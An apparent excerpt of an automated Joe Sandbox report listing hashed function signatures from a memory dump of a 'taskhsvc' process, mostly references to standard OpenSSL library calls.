                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID: A$u
                                                            • API String ID: 4216919130-1604213488
                                                            • Opcode ID: 857c2455cc79c1d6849e05e6cc8be6208f0e80402e22334957d59cd86cd5e041
                                                            • Instruction ID: eb5b686daf8d48bfe82953b5661256b4fff078fb93584b324a9ff10443bb6fad
                                                            • Opcode Fuzzy Hash: 857c2455cc79c1d6849e05e6cc8be6208f0e80402e22334957d59cd86cd5e041
                                                            • Instruction Fuzzy Hash: DD3106725087109FDB10DF26C54064BBBF4BB8A358F068A1DE9A8A7700D375A9058FE6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: InformationObjectUser$AddressErrorHandleLastModuleProcProcessStationWindow__stack_chk_failwcsstr
                                                            • String ID: Service-0x$_OPENSSL_isservice
                                                            • API String ID: 3082766447-1672312481
                                                            • Opcode ID: 3c95a5603f054f67acd93aaf3cadcd990a4bcfee9c190eda44de19a856090303
                                                            • Instruction ID: ebe3c7379c3485e4724e7d12dea12288729da2ec90b3925dbae143e28f186f99
                                                            • Opcode Fuzzy Hash: 3c95a5603f054f67acd93aaf3cadcd990a4bcfee9c190eda44de19a856090303
                                                            • Instruction Fuzzy Hash: 8D316CB19142018BDB009F79C84979EBBF4BF45328F218629E4A8EB791D778D504CBA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: E_adjtime
                                                            • String ID:
                                                            • API String ID: 3724316964-3916222277
                                                            • Opcode ID: 9a3ec15e23d16caa4fededc68a9398df1ba083fa3c228592d645a2d3d2cb1aa0
                                                            • Instruction ID: 93ce2badca2b778d1e6f27a1787978c57dc7faec208788dd6ddf76cb140dec32
                                                            • Opcode Fuzzy Hash: 9a3ec15e23d16caa4fededc68a9398df1ba083fa3c228592d645a2d3d2cb1aa0
                                                            • Instruction Fuzzy Hash: 13313475909712AFDB00DF61C580A5BBBF4AF88358F41A81EE9A987700D734E848CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_copyN_initN_num_bitsN_set_bitN_set_wordX_getX_start
                                                            • String ID: @
                                                            • API String ID: 968912958-2766056989
                                                            • Opcode ID: 4075ee647fb12bf265e94a0ab035130d862d502f4659062858488c77a0f69f84
                                                            • Instruction ID: 138b59462fcf946596975fc7b6d5459991f493b3808620ab6c01c1f2f69f16fd
                                                            • Opcode Fuzzy Hash: 4075ee647fb12bf265e94a0ab035130d862d502f4659062858488c77a0f69f84
                                                            • Instruction Fuzzy Hash: 453112B4519B00DFD320DF25C58479ABBF8AF85748F60982DE99987B40E738D948CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$N1_item_newP_get_asn1_flagP_get_curve_name
                                                            • String ID: A
                                                            • API String ID: 2200182127-3554254475
                                                            • Opcode ID: c82f080ca93f80ca9d2fa00cf08ea09590bd485a4f38138a43ce7b90d81d26e2
                                                            • Instruction ID: d545f64a5d724269d4c4f72bf39af26f2bcb6525f63ae181e18480bb0ef2552b
                                                            • Opcode Fuzzy Hash: c82f080ca93f80ca9d2fa00cf08ea09590bd485a4f38138a43ce7b90d81d26e2
                                                            • Instruction Fuzzy Hash: F12125B15093818FE7009F26C58125FBBF0AF84348F518C1DE8985BB90D7B4D54ACB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3025475216.000000006CE21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_load_strings$R_func_error_string__stack_chk_failmemcmp
                                                            • String ID:
                                                            • API String ID: 469510743-0
                                                            • Opcode ID: 6690d993fffff2f993094ffe450d42356ed21a0670006636d09bf0b68646ced9
                                                            • Instruction ID: 61e5f30f6ebc4fab92af278b2db4fbe3ee016ca22aeadbe67f62bfec0e1eeb75
                                                            • Opcode Fuzzy Hash: 6690d993fffff2f993094ffe450d42356ed21a0670006636d09bf0b68646ced9
                                                            • Instruction Fuzzy Hash: 745109756086008FDB00EF39C680A0AB7F1FB89318F169A5CE6A89B704D734F945CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: g$g$}
                                                            • API String ID: 1767461275-1352947115
                                                            • Opcode ID: ccc2256917f9fe7c0ab432adcc65f55adaf3c314dad053ece8f17f973c5b0952
                                                            • Instruction ID: 392e0504da4805ed199dd5c1dea662fc9c8383d3ced21fff1e544cb17a302fe7
                                                            • Opcode Fuzzy Hash: ccc2256917f9fe7c0ab432adcc65f55adaf3c314dad053ece8f17f973c5b0952
                                                            • Instruction Fuzzy Hash: 645107713097018FDB04EF29C58061BBBF1BB8979CF21895DE5A98B740E735E900CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: i
                                                            • API String ID: 1767461275-3865851505
                                                            • Opcode ID: 16de3a4fd740626105cda6cea590530a791d459db6c64e02114645659f8855a8
                                                            • Instruction ID: 3ccb12a33800a258ed1d65d31b5288e01e1348be79592d18970eca19861406a9
                                                            • Opcode Fuzzy Hash: 16de3a4fd740626105cda6cea590530a791d459db6c64e02114645659f8855a8
                                                            • Instruction Fuzzy Hash: D751E4716097019FE7008F25C58471BBBF5BB85318F22891DE9A48BB90D375E54ACF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ERR_func_error_string.LIBEAY32 ref: 6CEC4516
                                                            • ERR_load_strings.LIBEAY32 ref: 6CEC453F
                                                            • ERR_load_strings.LIBEAY32 ref: 6CEC4553
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_load_strings$R_func_error_string
                                                            • String ID: F
                                                            • API String ID: 420603542-1304234792
                                                            • Opcode ID: adadb9ba5cf9e2a5928504fe8bb11de8a81a246aaffcfe5c38c18441fba4088c
                                                            • Instruction ID: c955b88d60d165116521f1b9038e8e2dcddab48dc04c6ba0c61b78a8493a57e7
                                                            • Opcode Fuzzy Hash: adadb9ba5cf9e2a5928504fe8bb11de8a81a246aaffcfe5c38c18441fba4088c
                                                            • Instruction Fuzzy Hash: 2B3105B02193008FE740DF25D68475ABBF0BF44308F22895DD5988B7A1D7B9D449CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_freeN1_item_newR_set__stack_chk_fail
                                                            • String ID: A$V
                                                            • API String ID: 2270492745-4260965250
                                                            • Opcode ID: a3e35be101b5b862219cca5c8dbe9b756f5044adf7a55c0b30eecc73940f9750
                                                            • Instruction ID: f2218bba5e875ed4b46f05df9592ac291de3cbce6d5b37cf8a5f465cdd69a292
                                                            • Opcode Fuzzy Hash: a3e35be101b5b862219cca5c8dbe9b756f5044adf7a55c0b30eecc73940f9750
                                                            • Instruction Fuzzy Hash: 0C21C0B16087419FDB10DFA9C58064BBBE0AB89308F01891DF9948B700E778E948CB96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_item_new.LIBEAY32 ref: 6CF26E5D
                                                            • ASN1_INTEGER_set.LIBEAY32 ref: 6CF26E7E
                                                              • Part of subcall function 6CEFC200: CRYPTO_free.LIBEAY32 ref: 6CEFC22E
                                                              • Part of subcall function 6CEFC200: CRYPTO_malloc.LIBEAY32 ref: 6CEFC24A
                                                            • ASN1_STRING_set.LIBEAY32 ref: 6CF26EA5
                                                            • ERR_put_error.LIBEAY32 ref: 6CF27047
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_setN1_item_newO_freeO_mallocR_put_errorR_set
                                                            • String ID: A$V
                                                            • API String ID: 4101849597-4260965250
                                                            • Opcode ID: 6c9d8d28c7f4136b102dbddcb3026f9e49619932e8271631ebad0c948ba02406
                                                            • Instruction ID: 11eb67f52d5e86dd92cf858512a3259617bf79b7092801879ce73ca26c2386c0
                                                            • Opcode Fuzzy Hash: 6c9d8d28c7f4136b102dbddcb3026f9e49619932e8271631ebad0c948ba02406
                                                            • Instruction Fuzzy Hash: C62145B16093409FDB00DFA5C58074BBBF0AF84348F01882DF9988BB04E779D808CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ASN1_STRING_type_new.LIBEAY32 ref: 6CF54611
                                                              • Part of subcall function 6CF23F30: CRYPTO_malloc.LIBEAY32 ref: 6CF23F5A
                                                            • ERR_put_error.LIBEAY32 ref: 6CF546D7
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF546DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: G_freeG_type_newO_mallocR_put_error
                                                            • String ID: @$A$A$}$~
                                                            • API String ID: 2937794366-1801014758
                                                            • Opcode ID: 9a59b99802a6a64502cbc84c540ad763d881e3299396fe4d6a89f636a8b0cd1f
                                                            • Instruction ID: e330a953687350dcdb9cd1455d4926188883cd25587d528972eb61319d4319c8
                                                            • Opcode Fuzzy Hash: 9a59b99802a6a64502cbc84c540ad763d881e3299396fe4d6a89f636a8b0cd1f
                                                            • Instruction Fuzzy Hash: 6C211AB06097018FD710EFA9D18465FFBF4AF94308F52882DE6D887B40D7B4D8598B52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2i__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 314559513-0
                                                            • Opcode ID: 873feaf35299b093fcc12a2ff3686775e8be03d0e237ffb4cc717dde1996a848
                                                            • Instruction ID: e10a0cf6119248ecb16ce0e27f950e85b350a6d80e94f35988b92e09b8bde552
                                                            • Opcode Fuzzy Hash: 873feaf35299b093fcc12a2ff3686775e8be03d0e237ffb4cc717dde1996a848
                                                            • Instruction Fuzzy Hash: 3431C5716196419FCB50EF79C280A4FBBF1AB89318F529D1CE6A4CB704E730E9059F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_freeN1_item_new__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 683933353-0
                                                            • Opcode ID: 67e65e3cced25204a1b2a7ed57ae0c43be5f7f47e9308963b2e037bcbdc6047c
                                                            • Instruction ID: 5b69b93dace299f096e2efeb33ecf99bd51b8e28ec6c5ce000b4a7081c697351
                                                            • Opcode Fuzzy Hash: 67e65e3cced25204a1b2a7ed57ae0c43be5f7f47e9308963b2e037bcbdc6047c
                                                            • Instruction Fuzzy Hash: 4231BA75A196019FCB50EF79C68064BBBF1AB89318F52991CE6A4CB704D330A905CF86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N1_item_d2iN1_item_free__stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 1934435860-0
                                                            • Opcode ID: 0363b450710ee5575563364c4508b28dc19074f2664c08c8003c20dfe71cc6c9
                                                            • Instruction ID: 957ab88a4667af11188d3ffbd13496184c0287150233855d1bda03a26f7c1f51
                                                            • Opcode Fuzzy Hash: 0363b450710ee5575563364c4508b28dc19074f2664c08c8003c20dfe71cc6c9
                                                            • Instruction Fuzzy Hash: DF31D2715197419FCB50EF79D281A4FBBF0AB89318F46991CE9A48BB00D330E9098F86
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CE6E4BA
                                                            • CRYPTO_free.LIBEAY32 ref: 6CE6E51C
                                                            • ERR_put_error.LIBEAY32 ref: 6CE6E684
                                                              • Part of subcall function 6CE6D8A0: CRYPTO_malloc.LIBEAY32 ref: 6CE6DDA6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_malloc$O_freeR_put_error
                                                            • String ID: A$q
                                                            • API String ID: 2956623789-1492360937
                                                            • Opcode ID: f5ba127260339648af487becce5b37c71c4716259173f1b225d0de51c9c5b530
                                                            • Instruction ID: a232216d1e29142bab53bac1434c023888534cbe06af756eaaef4bcd8fe96b0f
                                                            • Opcode Fuzzy Hash: f5ba127260339648af487becce5b37c71c4716259173f1b225d0de51c9c5b530
                                                            • Instruction Fuzzy Hash: BD51E7746557019FD340CF2AC58070AFBF0BB89308F65895DE8588BB91E375E841CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: D_bytes__stack_chk_fail
                                                            • String ID: o$|
                                                            • API String ID: 3403545890-345082302
                                                            • Opcode ID: 19844a76f7648d624ebace6091bfc96604cdebc00797f5ec35ec40902fec4769
                                                            • Instruction ID: 1d1f7b089ca65511db7978bb6a99a5a09b9c29c31f8f7dfb81e410dc5136a446
                                                            • Opcode Fuzzy Hash: 19844a76f7648d624ebace6091bfc96604cdebc00797f5ec35ec40902fec4769
                                                            • Instruction Fuzzy Hash: 0C518E712097458BEB00DF29C58471BBBF1BF89348F25C91CE9988B790C775D905CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: B-163
                                                            • API String ID: 0-2771186707
                                                            • Opcode ID: 8aab9bc6e39a3777a3a9d39ffefac88a2ff0f7eebd785e0e89826ff4ce7b3f63
                                                            • Instruction ID: 9757fdaf214a5eda0a5d69491cd5c8314fe8170f3fffd87236d79849f564e140
                                                            • Opcode Fuzzy Hash: 8aab9bc6e39a3777a3a9d39ffefac88a2ff0f7eebd785e0e89826ff4ce7b3f63
                                                            • Instruction Fuzzy Hash: 5A4174317676418BFB10AA2DD14072F72F2EB8730CF31862AE96CA7F54D238D9814792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: strlen
                                                            • String ID: d$k$q
                                                            • API String ID: 39653677-396925492
                                                            • Opcode ID: 12f3a688ec49e5a0fc3fe4d6718e079b7ae96297bd374da59cd160eb719bbc49
                                                            • Instruction ID: f348e924a300ada2b61b3aa29605d1a37c0b6ffa4fa27e1876143fb6aa1aeb4d
                                                            • Opcode Fuzzy Hash: 12f3a688ec49e5a0fc3fe4d6718e079b7ae96297bd374da59cd160eb719bbc49
                                                            • Instruction Fuzzy Hash: 28514A706093418FD764CF2AC08075BBBF1EF86708F65591EE4A88BB40D775D90ACB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • BIO_new_fp.LIBEAY32 ref: 6CF5ED04
                                                              • Part of subcall function 6CEC87E0: BIO_new.LIBEAY32 ref: 6CEC8800
                                                              • Part of subcall function 6CEC87E0: BIO_set_flags.LIBEAY32 ref: 6CEC8816
                                                              • Part of subcall function 6CEC87E0: BIO_ctrl.LIBEAY32 ref: 6CEC882E
                                                            • BIO_free.LIBEAY32 ref: 6CF5ED39
                                                            • ERR_put_error.LIBEAY32 ref: 6CF5ED87
                                                            • NCONF_default.LIBEAY32 ref: 6CF5ED90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: F_defaultO_ctrlO_freeO_newO_new_fpO_set_flagsR_put_error
                                                            • String ID: h
                                                            • API String ID: 2099222323-2439710439
                                                            • Opcode ID: 9f73381f2748f70a2014abfce6703a026dfd114b4cb58bf37dfc00a42e7f8bad
                                                            • Instruction ID: 9310cabf5e55d3f95505e37c135bebfce7e598d1f39264c2b14990cc6f25e94c
                                                            • Opcode Fuzzy Hash: 9f73381f2748f70a2014abfce6703a026dfd114b4cb58bf37dfc00a42e7f8bad
                                                            • Instruction Fuzzy Hash: F93124726183009FDB10DF29D584A4BBBF4FB99318F42891DEAA497700D334E955CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Y_cmp
                                                            • String ID: s
                                                            • API String ID: 2861061372-453955339
                                                            • Opcode ID: c00a72968cb27be93f70c87893172caa1cf1d3614eaedb6d9d15542db10fe30c
                                                            • Instruction ID: 2e920003a4e2475430470b0bba7d344b31dc63fa60a0b596012193245cdc57f8
                                                            • Opcode Fuzzy Hash: c00a72968cb27be93f70c87893172caa1cf1d3614eaedb6d9d15542db10fe30c
                                                            • Instruction Fuzzy Hash: C3311CB2609321ABD7409F24C15030BBBF0BB45358F12AA2DE4988BB95C7B9D944CBD2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: {
                                                            • API String ID: 1767461275-366298937
                                                            • Opcode ID: 076501f55eafee699c6b1f5ef24a94d0044cc8fa3c163bc9f6af50b15c6e7f3f
                                                            • Instruction ID: f17f2ae8f2468f4d9fc09e6b7e179525aa315f302bcc99cfd354e5b9d620a29f
                                                            • Opcode Fuzzy Hash: 076501f55eafee699c6b1f5ef24a94d0044cc8fa3c163bc9f6af50b15c6e7f3f
                                                            • Instruction Fuzzy Hash: 2B310BB12183028BE710DF29C58170BBBF1AF85318F218A1CE4B88B780D775D846CF82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_mallocR_put_error
                                                            • String ID: A$H$l
                                                            • API String ID: 2513334388-1199877664
                                                            • Opcode ID: 7d437f5551e765556ba5a337f7827105b9a08eb1c5db90503061afe83b4956b8
                                                            • Instruction ID: 571c5f2d8104cdc8d990ec0a1bab3ace7a0cb5d9b296117d45ad1a2ee6fc3fbd
                                                            • Opcode Fuzzy Hash: 7d437f5551e765556ba5a337f7827105b9a08eb1c5db90503061afe83b4956b8
                                                            • Instruction Fuzzy Hash: B231A2B11193019BEB40CF25C68478BBBF4BB85308F51894CE9A85F745C3BAE949CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 6CEBEB50: CRYPTO_lock.LIBEAY32 ref: 6CEBEB87
                                                              • Part of subcall function 6CEBEB50: lh_doall_arg.LIBEAY32 ref: 6CEBEBA1
                                                              • Part of subcall function 6CEBEB50: CRYPTO_lock.LIBEAY32 ref: 6CEBEBC5
                                                            • __stack_chk_fail.LIBSSP-0 ref: 6CEC0D72
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$__stack_chk_faillh_doall_arg
                                                            • String ID:
                                                            • API String ID: 1839428306-0
                                                            • Opcode ID: 0562c13418699f18ca959608e6cca46a528b25fc444ee34e62ae54b05f923677
                                                            • Instruction ID: 25ac6dc7fa90fe42d3992259c7f56fcbdad65858b9af183f6f94dcf173096a75
                                                            • Opcode Fuzzy Hash: 0562c13418699f18ca959608e6cca46a528b25fc444ee34e62ae54b05f923677
                                                            • Instruction Fuzzy Hash: B8512FB56046418FCB00DF29C64165BBBF0BB89308F52895CE9A89B710E731E609CFC7
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EVP_MD_CTX_init.LIBEAY32 ref: 6CEA0D22
                                                            • EVP_MD_size.LIBEAY32 ref: 6CEA0D2A
                                                            • EVP_DigestInit_ex.LIBEAY32 ref: 6CEA0D7E
                                                              • Part of subcall function 6CEDCFD0: EVP_MD_CTX_clear_flags.LIBEAY32 ref: 6CEDCFF8
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CEA0D9E
                                                            • EVP_DigestUpdate.LIBEAY32 ref: 6CEA0DBE
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CEA0DEF
                                                            • EVP_DigestFinal_ex.LIBEAY32 ref: 6CEA0E1B
                                                            • EVP_MD_CTX_cleanup.LIBEAY32 ref: 6CEA0E47
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: Digest$Final_exUpdate$D_sizeInit_exX_cleanupX_clear_flagsX_init
                                                            • String ID:
                                                            • API String ID: 526810657-0
                                                            • Opcode ID: b53cdba4e55866c09a247fa6cc1e93eda9851d57490a8f8f6bc40675244b5936
                                                            • Instruction ID: 583f29908e890103e34f3824bbbd1c1a8020ffc82a5fcb2b6130029f6b1a4a3f
                                                            • Opcode Fuzzy Hash: b53cdba4e55866c09a247fa6cc1e93eda9851d57490a8f8f6bc40675244b5936
                                                            • Instruction Fuzzy Hash: E65165742083818FD710DF68C58064BFBF1AF89348F25892DE9DA8B711D731E94ACB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_num$sk_value$__stack_chk_failsk_delete
                                                            • String ID:
                                                            • API String ID: 2604466512-0
                                                            • Opcode ID: 718eb315a75e2ddff71a54803b64777cc6ba4b0d5b877da70df98e9f687c9d32
                                                            • Instruction ID: 543033fdb5ec8ad560e38df187436d7fa4b30272636a72c4d04da1763b3fc9cc
                                                            • Opcode Fuzzy Hash: 718eb315a75e2ddff71a54803b64777cc6ba4b0d5b877da70df98e9f687c9d32
                                                            • Instruction Fuzzy Hash: AB41F975509B309FC711EF29D58068BBBF0AF88354F166A1DE9A987710D730E94ACBC2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$O_mallocsk_pop_free
                                                            • String ID:
                                                            • API String ID: 1972609574-0
                                                            • Opcode ID: ea799cec53553045f06f2ab1b89bae954b71a50f6bcda3c52cc051d6c26a677f
                                                            • Instruction ID: 4bf58d6f325591951df87025fa49f2b224b235ad232b9fcea6fb1fe40cfe8846
                                                            • Opcode Fuzzy Hash: ea799cec53553045f06f2ab1b89bae954b71a50f6bcda3c52cc051d6c26a677f
                                                            • Instruction Fuzzy Hash: FA4105B12057018BEB109F29C8A475BBBF5AF40358F228A6CE4958FB91D779D448CFD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEB04EA
                                                            • EC_KEY_insert_key_method_data.LIBEAY32 ref: 6CEB054A
                                                            • ENGINE_finish.LIBEAY32 ref: 6CEB055F
